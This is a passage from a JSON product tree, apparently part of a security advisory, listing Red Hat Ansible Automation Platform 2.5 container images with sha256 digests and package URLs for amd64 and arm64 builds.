"name": "registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:47315b849e1e70f6240f310ed5b6d402f6512973bd94bb70d9138d03b790b1a8_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:47315b849e1e70f6240f310ed5b6d402f6512973bd94bb70d9138d03b790b1a8_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel8-operator@sha256%3A47315b849e1e70f6240f310ed5b6d402f6512973bd94bb70d9138d03b790b1a8?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774167258"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:049878acbb0f6297eae90180b88b011d00e954285d3197e2c19bc17e82f67523_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:049878acbb0f6297eae90180b88b011d00e954285d3197e2c19bc17e82f67523_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:049878acbb0f6297eae90180b88b011d00e954285d3197e2c19bc17e82f67523_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gateway-proxy-rhel8@sha256%3A049878acbb0f6297eae90180b88b011d00e954285d3197e2c19bc17e82f67523?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774399567"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:f1abc733921423176ccd6bc3b31093c151b84bdfa9a82b1f640a540edbfbf358_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:f1abc733921423176ccd6bc3b31093c151b84bdfa9a82b1f640a540edbfbf358_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:f1abc733921423176ccd6bc3b31093c151b84bdfa9a82b1f640a540edbfbf358_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel8@sha256%3Af1abc733921423176ccd6bc3b31093c151b84bdfa9a82b1f640a540edbfbf358?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774587114"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:d55d0744741b5fcd00107cc2a443dec11696a5daa453a4d992f1e15c3f4708b2_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:d55d0744741b5fcd00107cc2a443dec11696a5daa453a4d992f1e15c3f4708b2_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:d55d0744741b5fcd00107cc2a443dec11696a5daa453a4d992f1e15c3f4708b2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel8-operator@sha256%3Ad55d0744741b5fcd00107cc2a443dec11696a5daa453a4d992f1e15c3f4708b2?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774167254"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:e474929fa188b73d80eee028cd51e54f07157e587071cf60109f4398ea4dce30_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:e474929fa188b73d80eee028cd51e54f07157e587071cf60109f4398ea4dce30_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:e474929fa188b73d80eee028cd51e54f07157e587071cf60109f4398ea4dce30_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hub-web-rhel8@sha256%3Ae474929fa188b73d80eee028cd51e54f07157e587071cf60109f4398ea4dce30?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774589220"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:85c083ae0b2493347cbf1e5885ad56335b1799e545f136118cfe597f39f3df6e_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:85c083ae0b2493347cbf1e5885ad56335b1799e545f136118cfe597f39f3df6e_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:85c083ae0b2493347cbf1e5885ad56335b1799e545f136118cfe597f39f3df6e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/de-minimal-rhel8@sha256%3A85c083ae0b2493347cbf1e5885ad56335b1799e545f136118cfe597f39f3df6e?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774405413"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:1fcab1dccdd7ab7976ac0a57fad193d9411aecdc82cc24752378589978ab3c83_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:1fcab1dccdd7ab7976ac0a57fad193d9411aecdc82cc24752378589978ab3c83_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:1fcab1dccdd7ab7976ac0a57fad193d9411aecdc82cc24752378589978ab3c83_amd64",
"product_identification_helper": {
"purl": "pkg:oci/de-supported-rhel8@sha256%3A1fcab1dccdd7ab7976ac0a57fad193d9411aecdc82cc24752378589978ab3c83?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774409723"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:bde426912de4c15616e3b71408f4760fd12172dc97ce15d5511d0094784643eb_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:bde426912de4c15616e3b71408f4760fd12172dc97ce15d5511d0094784643eb_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:bde426912de4c15616e3b71408f4760fd12172dc97ce15d5511d0094784643eb_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ee-minimal-rhel8@sha256%3Abde426912de4c15616e3b71408f4760fd12172dc97ce15d5511d0094784643eb?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774404039"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:e8c26f06cca6450dc68a6160a6d1ababdf0992ed9000f27dea5177b813671653_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:e8c26f06cca6450dc68a6160a6d1ababdf0992ed9000f27dea5177b813671653_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:e8c26f06cca6450dc68a6160a6d1ababdf0992ed9000f27dea5177b813671653_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ee-supported-rhel8@sha256%3Ae8c26f06cca6450dc68a6160a6d1ababdf0992ed9000f27dea5177b813671653?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774446347"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:e0c6a368dc6da0906c102aa3587b297e7fe4d4072b5b019a2f3e1a0d54c8053b_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:e0c6a368dc6da0906c102aa3587b297e7fe4d4072b5b019a2f3e1a0d54c8053b_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:e0c6a368dc6da0906c102aa3587b297e7fe4d4072b5b019a2f3e1a0d54c8053b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-rhel8-operator@sha256%3Ae0c6a368dc6da0906c102aa3587b297e7fe4d4072b5b019a2f3e1a0d54c8053b?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774167608"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:5596feea40bd5eaf4e97a7eb33c4e7069e802fc921e1fa5fd65b7db9ff99637f_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:5596feea40bd5eaf4e97a7eb33c4e7069e802fc921e1fa5fd65b7db9ff99637f_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:5596feea40bd5eaf4e97a7eb33c4e7069e802fc921e1fa5fd65b7db9ff99637f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-runner-rhel8@sha256%3A5596feea40bd5eaf4e97a7eb33c4e7069e802fc921e1fa5fd65b7db9ff99637f?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774449833"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:b8ad28fb112c9f076499050ed7f27e1fce701bbc9cf3c1835c113a6a0bd9e915_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:b8ad28fb112c9f076499050ed7f27e1fce701bbc9cf3c1835c113a6a0bd9e915_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:b8ad28fb112c9f076499050ed7f27e1fce701bbc9cf3c1835c113a6a0bd9e915_amd64",
"product_identification_helper": {
"purl": "pkg:oci/receptor-rhel8@sha256%3Ab8ad28fb112c9f076499050ed7f27e1fce701bbc9cf3c1835c113a6a0bd9e915?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774399119"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:cbed194c572c59551a2b73e61d8c3821df77d5a9ca7d2275062c439996a24eb4_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:cbed194c572c59551a2b73e61d8c3821df77d5a9ca7d2275062c439996a24eb4_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:cbed194c572c59551a2b73e61d8c3821df77d5a9ca7d2275062c439996a24eb4_arm64",
"product_identification_helper": {
"purl": "pkg:oci/aap-must-gather-rhel8@sha256%3Acbed194c572c59551a2b73e61d8c3821df77d5a9ca7d2275062c439996a24eb4?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774398911"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:6fd7c632b981a1b0593c6af234c4b40d1046eabebe41ce29f75e1e010e92226a_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:6fd7c632b981a1b0593c6af234c4b40d1046eabebe41ce29f75e1e010e92226a_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:6fd7c632b981a1b0593c6af234c4b40d1046eabebe41ce29f75e1e010e92226a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ansible-builder-rhel8@sha256%3A6fd7c632b981a1b0593c6af234c4b40d1046eabebe41ce29f75e1e010e92226a?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774401522"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:b77247eccd37c9bc29631142605c6fab3af9d23ebf82b43f049664e44193d377_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:b77247eccd37c9bc29631142605c6fab3af9d23ebf82b43f049664e44193d377_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:b77247eccd37c9bc29631142605c6fab3af9d23ebf82b43f049664e44193d377_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ansible-dev-tools-rhel8@sha256%3Ab77247eccd37c9bc29631142605c6fab3af9d23ebf82b43f049664e44193d377?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774573155"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:9bbe1c621a8ee4c960e945c0f1a57c89654314435ea00083abbeb390991c62bb_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:9bbe1c621a8ee4c960e945c0f1a57c89654314435ea00083abbeb390991c62bb_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:9bbe1c621a8ee4c960e945c0f1a57c89654314435ea00083abbeb390991c62bb_arm64",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-chatbot-rhel8@sha256%3A9bbe1c621a8ee4c960e945c0f1a57c89654314435ea00083abbeb390991c62bb?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774414699"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:7d75c8ac498141ba26b4a927dbc4b4426a566da5ba09d4e0017fbf715bd05b27_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:7d75c8ac498141ba26b4a927dbc4b4426a566da5ba09d4e0017fbf715bd05b27_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:7d75c8ac498141ba26b4a927dbc4b4426a566da5ba09d4e0017fbf715bd05b27_arm64",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel8@sha256%3A7d75c8ac498141ba26b4a927dbc4b4426a566da5ba09d4e0017fbf715bd05b27?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774446874"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:c7b4a67cf4b2a1fece30e67d57c67d850d6f9866cf6fc39206b4ca09956e4deb_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:c7b4a67cf4b2a1fece30e67d57c67d850d6f9866cf6fc39206b4ca09956e4deb_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:c7b4a67cf4b2a1fece30e67d57c67d850d6f9866cf6fc39206b4ca09956e4deb_arm64",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel8-operator@sha256%3Ac7b4a67cf4b2a1fece30e67d57c67d850d6f9866cf6fc39206b4ca09956e4deb?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774167211"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:90d90e31d0afe833778743baf4eb3527402a65c30fdcce149ff8d4820faa3781_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:90d90e31d0afe833778743baf4eb3527402a65c30fdcce149ff8d4820faa3781_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:90d90e31d0afe833778743baf4eb3527402a65c30fdcce149ff8d4820faa3781_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ansible-python-base-rhel8@sha256%3A90d90e31d0afe833778743baf4eb3527402a65c30fdcce149ff8d4820faa3781?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774398095"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c5923a2649845cc20cdc2d015442d8007e9e0f77522d652d8af389437681c4ed_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c5923a2649845cc20cdc2d015442d8007e9e0f77522d652d8af389437681c4ed_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c5923a2649845cc20cdc2d015442d8007e9e0f77522d652d8af389437681c4ed_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ansible-python-toolkit-rhel8@sha256%3Ac5923a2649845cc20cdc2d015442d8007e9e0f77522d652d8af389437681c4ed?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774401376"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:6ec99dbde70c05dc5fbd64f81779f75ca8a131c0d3865f1be318a4cd8152ed33_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:6ec99dbde70c05dc5fbd64f81779f75ca8a131c0d3865f1be318a4cd8152ed33_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:6ec99dbde70c05dc5fbd64f81779f75ca8a131c0d3865f1be318a4cd8152ed33_arm64",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel8@sha256%3A6ec99dbde70c05dc5fbd64f81779f75ca8a131c0d3865f1be318a4cd8152ed33?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774401023"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:0d79e8c5f3f36c290006c0adbe7c14f57bad10566017f005ae4073905b170136_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:0d79e8c5f3f36c290006c0adbe7c14f57bad10566017f005ae4073905b170136_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:0d79e8c5f3f36c290006c0adbe7c14f57bad10566017f005ae4073905b170136_arm64",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel8-operator@sha256%3A0d79e8c5f3f36c290006c0adbe7c14f57bad10566017f005ae4073905b170136?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774167244"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:268a35d7a2bb13547826ec27291d5b48b2abe1d530b49a6085fcdde9410b61f8_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:268a35d7a2bb13547826ec27291d5b48b2abe1d530b49a6085fcdde9410b61f8_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:268a35d7a2bb13547826ec27291d5b48b2abe1d530b49a6085fcdde9410b61f8_arm64",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel8@sha256%3A268a35d7a2bb13547826ec27291d5b48b2abe1d530b49a6085fcdde9410b61f8?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774399338"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a592586194e5234cfcc2d783f876713771ac489c530205e87053a60b1dd90e04_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a592586194e5234cfcc2d783f876713771ac489c530205e87053a60b1dd90e04_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a592586194e5234cfcc2d783f876713771ac489c530205e87053a60b1dd90e04_arm64",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel8-operator@sha256%3Aa592586194e5234cfcc2d783f876713771ac489c530205e87053a60b1dd90e04?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774167149"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:17c4c5a579c802fc9a4ee935ad723f65c63aa63ce3b5e4a91705c12ec59feca6_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:17c4c5a579c802fc9a4ee935ad723f65c63aa63ce3b5e4a91705c12ec59feca6_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:17c4c5a579c802fc9a4ee935ad723f65c63aa63ce3b5e4a91705c12ec59feca6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-ui-rhel8@sha256%3A17c4c5a579c802fc9a4ee935ad723f65c63aa63ce3b5e4a91705c12ec59feca6?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774484106"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:78bb5cce2e05156b39a961747174a819c945298fb2f444ef321de6f2bbd5ac5b_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:78bb5cce2e05156b39a961747174a819c945298fb2f444ef321de6f2bbd5ac5b_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:78bb5cce2e05156b39a961747174a819c945298fb2f444ef321de6f2bbd5ac5b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel8@sha256%3A78bb5cce2e05156b39a961747174a819c945298fb2f444ef321de6f2bbd5ac5b?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774352226"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:8b63224e8726db24bf51a5456ef9ede17299e1d920d57a66c49be8a03d3485ed_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:8b63224e8726db24bf51a5456ef9ede17299e1d920d57a66c49be8a03d3485ed_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:8b63224e8726db24bf51a5456ef9ede17299e1d920d57a66c49be8a03d3485ed_arm64",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel8-operator@sha256%3A8b63224e8726db24bf51a5456ef9ede17299e1d920d57a66c49be8a03d3485ed?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774167258"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:c41ad877f30bc37bd9fe8422c410da12159b8fba7ab9ed0fd174e0d30a1ed125_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:c41ad877f30bc37bd9fe8422c410da12159b8fba7ab9ed0fd174e0d30a1ed125_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:c41ad877f30bc37bd9fe8422c410da12159b8fba7ab9ed0fd174e0d30a1ed125_arm64",
"product_identification_helper": {
"purl": "pkg:oci/gateway-proxy-rhel8@sha256%3Ac41ad877f30bc37bd9fe8422c410da12159b8fba7ab9ed0fd174e0d30a1ed125?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774399567"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:c8fd574a2ddb034be88d78b49ae22de5fea68679c0a9f1f3e24583ef118fb532_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:c8fd574a2ddb034be88d78b49ae22de5fea68679c0a9f1f3e24583ef118fb532_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:c8fd574a2ddb034be88d78b49ae22de5fea68679c0a9f1f3e24583ef118fb532_arm64",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel8@sha256%3Ac8fd574a2ddb034be88d78b49ae22de5fea68679c0a9f1f3e24583ef118fb532?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774587114"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:bac6445179c1c27314e958b41b3d67b1d34dcb05ac9a360a8fe297ab631d64f7_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:bac6445179c1c27314e958b41b3d67b1d34dcb05ac9a360a8fe297ab631d64f7_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:bac6445179c1c27314e958b41b3d67b1d34dcb05ac9a360a8fe297ab631d64f7_arm64",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel8-operator@sha256%3Abac6445179c1c27314e958b41b3d67b1d34dcb05ac9a360a8fe297ab631d64f7?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774167254"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:6481c675623cee9bcabd4a1c3a04d169c46e103c944af5ef69a75fc9bd69dfb8_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:6481c675623cee9bcabd4a1c3a04d169c46e103c944af5ef69a75fc9bd69dfb8_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:6481c675623cee9bcabd4a1c3a04d169c46e103c944af5ef69a75fc9bd69dfb8_arm64",
"product_identification_helper": {
"purl": "pkg:oci/hub-web-rhel8@sha256%3A6481c675623cee9bcabd4a1c3a04d169c46e103c944af5ef69a75fc9bd69dfb8?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774589220"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:7188e3f507cdaa346ed930c158379a67104dbdc74535a2b5a541cea60c03a123_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:7188e3f507cdaa346ed930c158379a67104dbdc74535a2b5a541cea60c03a123_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:7188e3f507cdaa346ed930c158379a67104dbdc74535a2b5a541cea60c03a123_arm64",
"product_identification_helper": {
"purl": "pkg:oci/de-minimal-rhel8@sha256%3A7188e3f507cdaa346ed930c158379a67104dbdc74535a2b5a541cea60c03a123?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774405413"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:ac48a386cf9175fa667538475607d8d7444e2d21e77bea8ce8d3bf291c59d4a0_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:ac48a386cf9175fa667538475607d8d7444e2d21e77bea8ce8d3bf291c59d4a0_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:ac48a386cf9175fa667538475607d8d7444e2d21e77bea8ce8d3bf291c59d4a0_arm64",
"product_identification_helper": {
"purl": "pkg:oci/de-supported-rhel8@sha256%3Aac48a386cf9175fa667538475607d8d7444e2d21e77bea8ce8d3bf291c59d4a0?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774409723"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:1254e449d313f5f663d056097b9cddbcd7fce91c7a6448b1d4f57c622d9556b3_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:1254e449d313f5f663d056097b9cddbcd7fce91c7a6448b1d4f57c622d9556b3_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:1254e449d313f5f663d056097b9cddbcd7fce91c7a6448b1d4f57c622d9556b3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ee-minimal-rhel8@sha256%3A1254e449d313f5f663d056097b9cddbcd7fce91c7a6448b1d4f57c622d9556b3?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774404039"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:eab05f26b14dd06d7e4f5580a873d8bdb18317abf1e82300da089cba5129bdb4_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:eab05f26b14dd06d7e4f5580a873d8bdb18317abf1e82300da089cba5129bdb4_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:eab05f26b14dd06d7e4f5580a873d8bdb18317abf1e82300da089cba5129bdb4_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ee-supported-rhel8@sha256%3Aeab05f26b14dd06d7e4f5580a873d8bdb18317abf1e82300da089cba5129bdb4?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774446347"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:7686b10f4f4091c5e56ce58c6c12f6cff0b7d5fd526fd606e92abf75eb6b13c2_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:7686b10f4f4091c5e56ce58c6c12f6cff0b7d5fd526fd606e92abf75eb6b13c2_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:7686b10f4f4091c5e56ce58c6c12f6cff0b7d5fd526fd606e92abf75eb6b13c2_arm64",
"product_identification_helper": {
